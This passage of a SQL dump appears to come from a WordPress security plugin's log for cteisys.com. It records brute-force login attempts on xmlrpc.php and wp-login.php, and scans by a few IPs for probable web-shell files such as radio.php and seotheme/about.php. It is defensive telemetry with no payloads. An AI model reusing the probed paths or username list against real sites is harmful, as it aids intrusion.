','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140878.6214,100,'hLOd6FsDYvKRHia59mVZg8qp','','13|0|0|0|cteisys.com/radio.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140877.6167,18,'n5qOSZBa3FNDbEM76GrsUoYx','','13|0|0|0|cteisys.com/about.php',0,13,0),('194.42.98.32',3257557536,'newd',0,1665129750.3876,152,'z83Q0S9xH6gvjhOGD7dYbsLR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'newd',0,1665129360.6971,152,'aEslTMjd8WopVAnPgcq9ruKU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1665128986.7307,152,'vb4fjcJqw1BOyVT09thgPIRF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1665128575.6948,152,'uI1mXGC3fxeVhz5ybtRJPNrO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.29.249',2112036345,'newd',0,1665128203.0107,152,'UH9VoNQFjCTZW3iShxA0RuqX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.235.48.108',1156264044,'Joyce',0,1665127671.1979,152,'iVbtZcjyqOfgnamNrAeh1EKI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665127495.0270,152,'JQ48ipInKHL6FfxZMkBUz9vG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.171',1868207787,'newd',0,1665127096.9971,152,'Sgk0uTvo2qy3XcwfeIxD6CFl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1665126728.0445,152,'yY7IOMSWAtQ5Dqdr3Nv1b0LT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140876.5470,100,'6nOJq9jNxbclmF8Q7PAHtMB4','','13|0|0|0|cteisys.com/about.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140875.4503,18,'D1jdtcf4q2RprPZAKxuThM7I','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140874.3447,100,'Kd1makHyDgTM8zreqU3fBIJw','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140872.3724,18,'Sl5abKmWOcX7DrzTZ2GHgqUd','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140872.3718,71,'Sl5abKmWOcX7DrzTZ2GHgqUd','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140869.8990,100,'2rLpndwkT9NYmcGOKIohiR8D','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('150.230.247.143',2531719055,'newd',0,1665133036.9454,152,'qILrbhBJupc2WPmk4S5egs9y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.130.83.34',763515682,'newd',0,1665132582.0352,152,'gRPbWYJlfFxdoDCtkIp6Xi2q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665132161.1055,152,'xUrdyNODmEeavbG9Piz5BKfs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1665131765.4177,152,'KiqugLCzwNf9TklRGocW5rJj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1665130945.9693,152,'0niq8uvxgLyE9ZM6dbY5XoOj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.7',3355043335,'Joyce',0,1665130772.8731,152,'ouzQcxsn1j4kT0RwOp8ZF7UX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1665130553.8649,152,'xS5ypfcaoCA3q0Fv78BJH4TP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1665130158.2406,152,'h2gAacn1QHKOfm09GBNEFUwL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.5.104.175',335898799,'newd',0,1665129920.7003,152,'6q3MahfbeNXOpFrUizQjPv0o','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('146.70.115.139',2454090635,'joyce',0,1665129762.0426,152,'AuzQvYiX8Z25Fw9CpcjGxLsH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140869.8982,71,'2rLpndwkT9NYmcGOKIohiR8D','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140868.6825,18,'oyBWVzrht9nkDf8iG4cgj7JZ','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140866.4289,100,'vUWIjEmys6rtgCFDpfSxw2lc','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140865.2837,18,'2TIVOnurQfhXcU9pjSZAsmYa','','13|0|0|0|cteisys.com/admin.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140864.2401,100,'EJeHLqG5lYanfUCxzDpydkbZ','','13|0|0|0|cteisys.com/admin.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140863.0404,18,'X7d5gx2ieJqtUzNRyDI8Zfvp','','13|0|0|0|cteisys.com/load.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140862.0288,100,'gFWthDNiInPlYAB6L5exQJs1','','13|0|0|0|cteisys.com/load.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140860.9499,18,'vBuE6iWd95D2gpOZeMjtInw3','','13|0|0|0|cteisys.com/',0,13,0),('167.172.166.178',2813109938,'',0,1665140859.6014,100,'p5QmYaO1hxVJuiKvdkbXE276','','13|0|0|0|cteisys.com/',0,13,0),('167.172.166.178',2813109938,'',0,1665140858.2811,18,'ze48Wxlw5721kOvF6HptDbPM','','13|0|0|0|cteisys.com/1index.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140857.1078,100,'svWRK3aloOzifkgb0INjPDyr','','13|0|0|0|cteisys.com/1index.php',0,13,0),('51.210.99.98',869426018,'newd',0,1665136573.5495,152,'BFOefT8xAbph95gGYKHmDJSC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.46.121.66',3106830658,'newd',0,1665136124.5699,152,'HowLRhdOql5AnVtf9zPWYD7J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665135671.0698,152,'BHArJcUnuzaOEgoYx4lRSDpm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'newd',0,1665135369.7590,7,'GH1XSzNU5maCvg9nM7QEcLFo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665134775.7300,152,'osZKM5X69AraETD1GYvOxFmJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.170',3583549866,'joyce',0,1665134662.7162,152,'nY7GVCMJe4m5OTxHNLIFDa83','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665134337.8111,152,'A7hwg3IUo1EBxO8z6TcbvJDC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140856.0528,18,'e0c5F8TjKpHMR9JhOqtwrU2S','','13|0|0|0|cteisys.com/2index.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140855.0012,100,'LyOnUdue5Y8oZSrqI97NfKPk','','13|0|0|0|cteisys.com/2index.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140853.3527,18,'uHWVrRIaPtSFgeEGY5qsljcn','','13|0|0|0|cteisys.com/votes.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140852.2445,100,'fbc2zjMp7SlxNdUFwZqETo8J','','13|0|0|0|cteisys.com/votes.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140851.0871,18,'bJ7XHr9ZOtDywSGskBdP8R2I','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('157.0.140.186',2634058938,'admin',0,1665140012.7349,51,'PuxIW8vf3HCeVb0nd9XzwE6D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.149.103.132',3583338372,'newd',0,1665138861.3526,152,'VkB9HJK3O42bSizdlmXDRNoe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.129.186',2671870394,'newd',0,1665138793.8741,152,'NlhVgQfYvEAqyKO7FU3GzCHM','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('38.242.221.235',653450731,'newd',0,1665138401.0031,152,'fIacgBEjU1xqTz4P9XFNJWsH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.242.56.232',3270654184,'newd',0,1665137956.2645,152,'b574HpATgW2iqkEyX9Ptu3wz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.6.209',2335901393,'newd',0,1665137009.5257,152,'vTcxOJ9QyFWkHzCXerG2a3NA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.166.178',2813109938,'',0,1665140849.9315,100,'OPKcbyCfdEMsa4N25unUxQ0H','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140848.6316,18,'8OjngfFoQCzasqrBDi9EmLN3','','13|0|0|0|cteisys.com/contents.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140847.4902,100,'aJBC4rctWTHpqdK6fbh7QOAs','','13|0|0|0|cteisys.com/contents.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140846.4111,18,'C73zvATsIJYgNaPqUBdjFZ4X','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140845.3987,100,'VjfLCBx8N3iF9ztkqYQ0Rwm2','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140841.8753,18,'CT8RoFm4rxJ2iWKnbtvGDHBk','','13|0|0|0|cteisys.com/css/index.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140840.5666,100,'MucenTJZSsNxa23wELDqjBgo','','13|0|0|0|cteisys.com/css/index.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140839.5285,18,'M30hoXDakpenzc7JR4STAdNI','','13|0|0|0|cteisys.com/years.php',0,13,0),('167.172.166.178',2813109938,'',0,1665140838.1931,10,'O0vdafnFU71NgWmYHEwepB6P','','707|0|0|0|cteisys.com/years.php',0,707,0),('167.172.166.178',2813109938,'',0,1665140838.1912,55,'O0vdafnFU71NgWmYHEwepB6P','','19|0|0|0|cteisys.com/years.php',0,19,0),('167.172.166.178',2813109938,'',0,1665140836.8948,55,'c0ern1ysXhQAZt62uDHLOim8','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('167.172.166.178',2813109938,'',0,1665140835.8645,55,'7LprslyoJvhtIPVFCd1Y2mQk','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('167.172.166.178',2813109938,'',0,1665140832.0415,55,'XeuP8U5JdkTb6Dp2RAHf7lZm','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('167.172.166.178',2813109938,'',0,1665140830.9867,55,'5cMowdJBq9gEV4a3CDrbYNjR','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('171.244.17.110',2884899182,'admin',0,1665147674.7147,152,'TZlMObqypugjF1xSGkXf5vd7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.187',2249438139,'joyce',0,1665147674.7094,152,'bj7Ze130EOwu5pTWLQdXcRGD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'wwwadmin',0,1665146545.7167,51,'e23doObXfWx50vQLHTZ6jY8D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.64.127.195',3644882883,'joyce',0,1665146373.2727,152,'ImQuyTWe9rdwK053qaiEg6jc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.219',3583549915,'joyce',0,1665146295.7160,152,'zVUEuPf4FxaH3KhtlekOrQsg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.211',3091980243,'Joyce',0,1665146228.9268,152,'x4PpwydaDEGkoLtv1qbO5Mhe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.110.180.235',57586923,'wadminw',0,1665145514.9604,51,'vpYeHZzb6WhAJTD5ROQ8NMPo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.195',3091979715,'Joyce',0,1665145125.6822,152,'O5kE10Hyiuo3r8wgJfPeLWcm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'admin',0,1665144870.7308,51,'bydqVznjYxDrI6JHEQ3Lu9U5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1665151066.0627,152,'Ztvh6obfMqiwQljI45uNCEyP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665150533.6987,152,'LtShAXGoz2cgJmQCuyneP1Oi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'admin',0,1665150013.8181,152,'p8mYiUzPo9473vXukySOWEec','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'admin',0,1665149480.2568,152,'ux80v2hR9KNQFHcGblM4rDiE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.85.69',2994754885,'wwwadmin',0,1665148567.5220,152,'DbGNkgtiBvKcMmWuaZhoye20','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'wadminw',0,1665148065.1535,152,'oB82MhwIkd0cqRbgFZauTz9L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.12.67.132',1024213892,'newd',0,1665155811.2947,152,'d0em2RDYMrlFpbEOHntWXVSJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'newd',0,1665154753.4136,152,'s6kRKIBPJVZc0E2xC3hbuSdm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.223',1364735199,'newd',0,1665154202.7981,152,'8xNSmDhGolbie0gVvrX1M62F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.116.203',3116922059,'joyce',0,1665154046.2629,152,'n1sDLIzC4oxY8ASBdbErZjGl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1665153679.3317,152,'brAV3K1YLh8WyUEw6OQHBjmZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1665152626.8494,152,'HgwA9ZPdM3vGIEDcKBbyWYep','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1665152118.2474,152,'CfTzp5iuYZd39tbXl7G86jAM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1665151585.6097,152,'a9qlGcbN4uLWxYv2hoP5QiO6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.254.90.251',1761499899,'joyce',0,1665156863.2767,152,'gX7aroIO4wt6H1J92ZSFWKhj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.155.179',628661171,'joyce',0,1665161454.1458,152,'vnjsgt8E62H7rG1MWmzI9aBd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.162.204.238',2997013742,'Joyce',0,1665161182.6350,152,'OETxsBXNo7zVJYDlAh4StfQ5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.186.173',3583556269,'joyce',0,1665161050.3666,152,'4qjU8OpfuTF0VoxlserithIm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.126.102',2703457894,'newd',0,1665160858.9169,7,'I5yE1cgeaJVFTlQrNSUWpLwu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.174.27',3114053147,'joyce',0,1665160210.4586,152,'W21rBZoAmqwj6bIUp0THXVFL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665159183.1079,7,'hnQ5HrXCEAY7P9UOfKBZgu4c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.67.66.32',910377504,'newd',0,1665164170.0805,7,'E1gz7p95WfcMhujKYVRGHvLb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.219',3091980251,'joyce',0,1665164067.3097,152,'csEAvHMalb5yPQD9uzTt630N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1665162524.7338,7,'6kqshi3d4gxM0VIBm7eQtALD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.190.142.217',3116273369,'newd',0,1665169088.2616,7,'N6TiHPMwQthOWzJUlboCIxpu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.3.164.156',3104023708,'newd',0,1665167455.0510,7,'ZhSq97PbHMv0yC1gTUKisx6Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.170',3583550122,'joyce',0,1665165968.2756,152,'VPftJLX8EjiKUn91yGB24dep','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1665165830.0066,7,'pESIslFUPcu6CjHMxwa9h2bJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1665172282.6527,7,'AKGm8gkzOyZVcdvRW2Hlb7N3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665170692.3740,7,'6mNIcOksP4nEgb9Uqx3h7Sfr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.156',1046910108,'Joyce',0,1665169307.4809,152,'RbnZWIAx8K10gXDMwBt5YrNo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.108.148.88',661427288,'newd',0,1665175513.2387,7,'I6DaMGxAqYt72vikpFBV5Z0U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1665173873.2621,7,'r7IFY3UgDo8GqXSNhRZCc60n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665177139.5643,7,'rLWmNsiVw65SjDk4cMYPZdIU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.56.99.136',2453169032,'newd',0,1665182035.5339,7,'H5tWSzmo2sL8iaF7vZOp3TCN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1665180401.0008,7,'ijnxthcXSHgBlUP4mRasY2O0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1665187018.5062,7,'FqvbZ6MEKStdk4xipOaRsUoD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1665185354.1528,7,'zZC6dWubr0gQaoFTAy781eI2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.60',3114053436,'Joyce',0,1665184044.8964,152,'sLMJZhGxT9SIicFvm7fARNrb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665183687.9048,7,'tmIS5TyFPzJ9aAb0GN7cK4Uh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.228.208.88',2565132376,'newd',0,1665190337.9647,7,'FlRZ8Oca1QuGBzvIf0nP6Ntj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.153.66.86',2090418774,'newd',0,1665188689.6554,7,'9k0qdHzgltNsahBy3Vj2no85','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.165',3583550117,'joyce',0,1665195392.2338,152,'ngLUzJ5TtfuaQblkX739sF4C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1665195391.4945,7,'20VWTONI6wkzKmfPj9HRAeaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.98.101.133',2372035973,'joyce',0,1665193797.2671,152,'KLrnth0a6UgR4JSFCzlPbmEx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.90.29',2319735325,'newd',0,1665193708.5637,7,'bUTtApiDnFc63mReSHk4lEXB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.42.179.59',1076540219,'joyce',0,1665193141.5477,152,'fQ4BnoWYh1XmkUjzwONMJa35','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.249',3583549945,'joyce',0,1665192769.9708,152,'eF2aXBZPrWTtv4LcnEmpgs1A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1665192024.5065,7,'z4QqPYmaXcivyshSK5wIrpNn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.188.29.168',96214440,'',0,1665191344.2975,18,'i5ILzX4uZy2d6OrVgocW3CHG','','13|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191343.0530,100,'eQJ2qG3c7ExVm6f4Zrd5HRgj','','13|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191341.8894,18,'GbXlxRBIWN38TUF5OZ6qCE9Q','','13|0|0|0|cteisys.com/wp-admin/wikindex.php',0,13,0),('5.188.29.168',96214440,'',0,1665191340.7782,100,'1rmRn3WXvJG940HoSP6yiekE','','13|0|0|0|cteisys.com/wp-admin/wikindex.php',0,13,0),('5.188.29.168',96214440,'',0,1665191339.6101,18,'LM2O1coIeKy8gErQSWlYNsBR','','13|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191338.5747,100,'RnTF3M1PSQX8x0DkGoa7yCEK','','13|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191337.3346,18,'0OA6HG7V2XQhMcvsDomuFeJN','','13|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191336.2488,100,'V0Degmy4ab7A6RCUx8vKFJHW','','13|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191335.1781,18,'s57Tmrz1PI8hqBM4Caw9XJtS','','13|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191334.0632,100,'85ECrSmtvzPBoa6V1LjMnwbc','','13|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191332.8780,18,'76x4a10wQNmctWn9AfgJuiYT','','13|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191331.4746,100,'RpKl3cDYh79t2MPsbkAzBGQU','','13|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191330.0934,18,'4gD359dYXOKC2AiIZeQlVf08','','13|0|0|0|cteisys.com/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191328.7342,100,'0hmiv3KRsdAnUQzrqJV1lTZ5','','13|0|0|0|cteisys.com/radio.php',0,13,0),('5.188.29.168',96214440,'',0,1665191327.6125,18,'kVzrtIDlboOhxus8eCA27WYJ','','13|0|0|0|cteisys.com/about.php',0,13,0),('5.188.29.168',96214440,'',0,1665191326.5167,100,'MNP1oOriAQ42u6hGBYFU8dxR','','13|0|0|0|cteisys.com/about.php',0,13,0),('5.188.29.168',96214440,'',0,1665191325.1909,18,'nOJrajcieYRNFmKAZbUvMlzG','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('5.188.29.168',96214440,'',0,1665191323.9680,100,'7AXinY8NbxyKDoM4chGsrmgV','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('5.188.29.168',96214440,'',0,1665191322.8369,18,'iNuEvUIPo8g1k725nAVYhD3O','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('5.188.29.168',96214440,'',0,1665191322.8364,71,'iNuEvUIPo8g1k725nAVYhD3O','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('5.188.29.168',96214440,'',0,1665191321.7050,100,'Uop9TwiIPxnlVqY16XLgRmMC','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('5.188.29.168',96214440,'',0,1665191321.7046,71,'Uop9TwiIPxnlVqY16XLgRmMC','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('5.188.29.168',96214440,'',0,1665191320.6653,18,'yrt5cdl17OkYf94GZTeiUq3Q','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('5.188.29.168',96214440,'',0,1665191319.4881,100,'0wmpraAlvUy7SoLY6J5nPziK','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('5.188.29.168',96214440,'',0,1665191318.3643,18,'6KivwNEdLYZRlgB4jpuMtcOn','','13|0|0|0|cteisys.com/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191317.1759,100,'MU1hvHLmkXIA7Pg6iZzJ83w2','','13|0|0|0|cteisys.com/admin.php',0,13,0),('5.188.29.168',96214440,'',0,1665191316.0270,18,'TiP9ykSHrNlwsm4xeUfhY62Z','','13|0|0|0|cteisys.com/load.php',0,13,0),('5.188.29.168',96214440,'',0,1665191314.8963,100,'IwQN9BJFLMOKh8ElAygZzbf5','','13|0|0|0|cteisys.com/load.php',0,13,0),('5.188.29.168',96214440,'',0,1665191313.7968,18,'Dn7uaIJV4ZpgjsNMf5Eo3iq9','','13|0|0|0|cteisys.com/',0,13,0),('5.188.29.168',96214440,'',0,1665191312.6368,100,'TOjVFa1IW5niGC03fE6xegm9','','13|0|0|0|cteisys.com/',0,13,0),('5.188.29.168',96214440,'',0,1665191311.4472,18,'m8lBv1nPXzYu4DtNrKeF7hMO','','13|0|0|0|cteisys.com/1index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191310.3821,100,'1ZHsLCh8Xw7y35vt0QqNUifm','','13|0|0|0|cteisys.com/1index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191309.2870,18,'61lUxQ8REbiWNmOfDBMdYXLs','','13|0|0|0|cteisys.com/2index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191308.2511,100,'Sve17pHjsGZ9kA5lUrn38NzV','','13|0|0|0|cteisys.com/2index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191307.1901,18,'gztRFAoUNY7lys4D5wfVESh6','','13|0|0|0|cteisys.com/votes.php',0,13,0),('5.188.29.168',96214440,'',0,1665191306.0205,100,'xrZR576MWNVeBYHz2afFlLIK','','13|0|0|0|cteisys.com/votes.php',0,13,0),('5.188.29.168',96214440,'',0,1665191304.8471,18,'7HPmdBefWRhlVavuwJ3ZrIpK','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('5.188.29.168',96214440,'',0,1665191303.6730,100,'L1rXgGWAVOPYhfTKyEud75Qc','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('5.188.29.168',96214440,'',0,1665191302.5256,18,'YszkfnvE908KIWyGimqPXShN','','13|0|0|0|cteisys.com/contents.php',0,13,0),('5.188.29.168',96214440,'',0,1665191301.3982,100,'G2rIUZ8V1p4PHFzME3BuhLvN','','13|0|0|0|cteisys.com/contents.php',0,13,0),('5.188.29.168',96214440,'',0,1665191300.3275,18,'z3Z79rBEp0bTuvPGKAeCwqxY','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('5.188.29.168',96214440,'',0,1665191299.1708,100,'dp6EKnbL4aJNmj1ukoU85VrQ','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('5.188.29.168',96214440,'',0,1665191296.4944,18,'pbuB9yewxCAv6sHQROoI2Ydr','','13|0|0|0|cteisys.com/css/index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191295.3516,100,'gpYD8dnVMxmGjSLJoPIlzhH6','','13|0|0|0|cteisys.com/css/index.php',0,13,0),('5.188.29.168',96214440,'',0,1665191294.2759,18,'Z01yOWsxJTh3YQzKPHvbESVu','','13|0|0|0|cteisys.com/years.php',0,13,0),('5.188.29.168',96214440,'',0,1665191293.1936,10,'Hko96cIrYnxigDzAEUwq4CTt','','707|0|0|0|cteisys.com/years.php',0,707,0),('5.188.29.168',96214440,'',0,1665191293.1912,55,'Hko96cIrYnxigDzAEUwq4CTt','','19|0|0|0|cteisys.com/years.php',0,19,0),('5.188.29.168',96214440,'',0,1665191292.1147,55,'IymRHcNfJ9pX1K7xUA3GkaLg','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('5.188.29.168',96214440,'',0,1665191290.9563,55,'X7Zk8j9WYrJTLznicHpes0Il','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('5.188.29.168',96214440,'',0,1665191286.8182,55,'OkdQSYF3jxr2KBNyGWZmRU8V','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('5.188.29.168',96214440,'',0,1665191285